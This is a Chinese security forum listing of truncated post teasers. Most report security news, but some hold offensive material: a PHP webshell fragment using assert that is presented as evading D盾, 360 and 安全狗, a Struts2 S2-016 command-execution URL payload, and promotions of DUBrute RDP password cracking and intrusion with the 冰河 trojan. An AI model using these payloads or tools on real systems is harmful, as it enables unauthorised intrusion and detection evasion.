电脑病毒论坛 今日: 0|主題: 1421|排名: 15 

D盾，他不认识二维数组，所以就很轻松绕过了。  对了 还有360哦~  测试了下安全狗，也查不出来，，。 <?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind'](D盾，他不认识二维数组，所以就很轻松绕过了。  对了 还有360哦~  测试了下安全狗，也查不出来，，。 ___FCKpd___0 过D ...

Struts2的S2-016漏洞是之前比较重大的漏洞，也是一些老系统的历史遗留问题 此漏洞影响struts2.0-struts2.3的所有版本，可直接导致服务器被远程控制从而引起数据泄漏,影响巨大 漏洞修复总结有4种方式： 1、升级版本 这也是Apache官方给出的建议，把Struts2的版本升级到2.3.15以上的版本，这种方式只需要替换一些jar包，归纳 ...

在2013年6月底发布的Struts 2.3.15版本被曝出存在重要的安全漏洞 ，主要问题如下： 可远程执行服务器脚本代码 用户可以构造http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}链接，command goes here可以换成是破坏脚本的 ...

DUBrute是一款强大的远程桌面(3389)密码破解软件，你可以用本附件的扫描功能来自动扫描活跃IP地址，扫描完成后设置好用户名与需要猜解的密码就可以开始全自动工作了。只要你密码设置的好相信会有很大的收获哦。3389是一个远程桌面的端口，很多人为了更方便管理服务器，更新服务器上的资源等，经常会开启3389端口，用nastat ...

在Black Hat 2016大会上，两名比利时的安全研究人员展示了他们今年的研究成果。他们发现了一个WEB攻击方式可以绕过HTTPS加密得到明文信息。他们把这种攻击方式叫做HEIST攻击。HEIST的全称是Encrypted Information can be Stolen through TCP-Windows。大体意思就是通过TCP-Windows协议可以窃取到加密的明文信息。 FreeBuf百 ...

前言 每一段岁月，都会留下属于时代的记忆——那些年，我们所追逐与热衷的安全工具，亦是如此。 在那个信息不对称的年代，安全工具主要是在小圈子内传播。当年天真的我们（脚本小子），以为网络就是江湖，一套完美的工具就是你的兵器——路见不平一声吼，碰到注入亮阿D。 注：由于年代久远，当年的工 ...

Docker是世界领先的软件集装化平台，针对不同的渗透测试类型，我们完全可以使用Docker创建相应的环境。有了Docker容器，你可以把测试环境放到U盘或者云端。 Docker是什么 Docker是一个开源的技术，在软件容器中，你可以创建、运行、测试和部署应用程序。Dcoker可以让你在任何环境中快速、可靠、稳定地部署应用程序。 容器 ...

根据一份普林斯顿大学研究员的报告，电池状态已经在一些网站被用来跟踪你的在线活动。漏洞触发的原因是因为电池状态API。 又是电池？ 去年的时候，斯坦福大学的研究员就曾发表研究，他们通过电池在特定时间内的消耗对手机用户的物理位置进行定位，他们把这种追踪方法命名为PowerSpy，准确度高达90%。PowerSpy利用了蜂窝传 ...

手机病毒非常可怕，前段时间小编的手机就中了一次病毒，让我手机直接差点变砖了，损失惨重啊，不过最后我还是通过自己研究解决了这个问题，不过手机病毒如此恐怖，如何保护手机安全，我今天想和大家分享一下，希望让这些可恶的病毒，再也不能危害到大家，我总结了5个方面，今天和大家分享一下希望有所帮助吧 【诈骗短消息】 ...

人总有一死，现在想想我的八位qq那么值钱，等我死了岂不是更值钱了？我的qq号以后怎么办呢，更别说自媒体管理员，几百万人的粉丝账号怎么办？你考虑过死了以后你的私人账号怎么办吗？ 那你在离开人世之前，考虑过如何处理你的“数字身后事”吗？ 人死了，手机里面的数据就该破解了 据《日经中文网》报道，近期日 ...

网络通讯这么发达，自然只要与时俱进的人都会使用通讯工具，打电话的人越来越少了，其实不只是我们在使用微信等通讯工具，全世界的人都在使用各种通讯APP，包括IS成员，那么，这些IS成员究竟是用什么软件来保密自己的消息呢 7月1日，约5名ISIS武装恐怖分子突袭孟加拉首都达卡一家名为Holey Artisan Bakery餐厅，在12小时 ...

一直以来苹果系统的安全性都是比安卓要高的，但是再安全的系统也免不了漏洞，苹果也一样。最近爆出的新漏洞，这次出现在苹果设备上、编号为CVE-2016-4631的高危漏洞（针对不同操作系统的编号会有差异，这里4631针对的是iOS），要利用起来真是相当容易，因为的确是只要给受害者的苹果设备发条MMS多媒体消息，或者iMessage， ...

最近参加了一个夜跑活动，活动结束后到终点扫描二维码摇一摇，所有人都摇到了纪念奖。可是我想要一等奖啊！谁不想在摇一摇里得到一等奖？一起来看看下面这位黑客的做法，能给你带来什么启发，或者应该怎样防御这样的攻击。 起因：公司年会活动，[微信摇一摇]，第一者给予xxx奖励。 流程:微信公众号关注，回复摇一摇文字返回 ...

还记得我们之前说过的有个白帽子提交了世纪佳缘的漏洞然后被世纪佳缘告了的事情吗？这件事情引起了国内很多白帽黑帽的关注，如今事情又发酵，中国最大的两大漏洞平台——乌云和漏洞盒子同时出现状况。我们想看到这方面的监管和立法能跟上时代，仅此而已。 昨天晚上微博用户@互联网的那点事 爆料，一向在发布互联 ...

未来的互联网最重要的不是速度，不是容量，而是安全。黑客这个词很多人已经耳熟能详，虽然他们是一群神秘的人，但不能判断他们是不是好人，越厉害的往往威胁越大。其实有一群厉害的好人，他们就是“白帽子”。 在全球各地，有这样一群人，他们每天足不出户，只是坐在电脑前；他们不干别的，每天就在各大网站找bug ...

因为接触这个行业，所以在密码方面有深深的恐惧。商场里提供免费wifi，然后也提供支付宝微信支付，竟然有这么多人真的敢用着公用wifi付款买单，市场上共享wifi密码的软件层出不穷，我相信你肯定也用过，可你真的知道一进门不用输密码就连上wifi的原理吗？你能连上别人家的无线，别人能连上你家的吗？ 网络时代，很多人走进 ...

南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决，我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这次我们可不是说着玩玩。“若有战，召必回”湿了多少人的眼眶。这边，黑客军团里，也开始借南海问题各种攻击。 最近，一个与东南亚和中国南海问题相关的APT攻击被发现，该APT攻击以包括美国在内的各国政 ...

随着移动端应用市场数量爆炸式增长，App推广和曝光率也越来越难。哪里有需求哪里就有生财之道，自然，App刷榜也就形成了一条产业链，它能够在短期内大幅提高下载量和用户量，进而提高应用的曝光率。当你打开应用市场想要下载一个功能性的APP，搜索结果出来后是不是都要看一下旁边的下载量？有时候还会看一下用户评论，那么 ...

　　木马冰河是一款功能强大的远程控制软件，因为它的功能很强大所以成为了黑客们发动入侵的工具，2HK联盟Mask曾利用它入侵过数千台电脑，国外电脑也不例外，一起来看看哪十三步简单入侵个人电脑吧。 　　第一步 　　下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”，2号软件就是著名的国产木马冰河 ...

《Pokémon Go》是任天堂 okémon（中译名口袋妖怪、宠物小精灵、精灵宝可梦）系列的最新游戏，由 Niantic Labs 联合开发，也是第一款 Pokémon 手游。不需多说，看到这篇文章的你，多半正在玩或者已经下载好了游戏。可是这款游戏在国外网友眼中手机上要的权限未免过大了，我想这篇文章你看完，可能 ...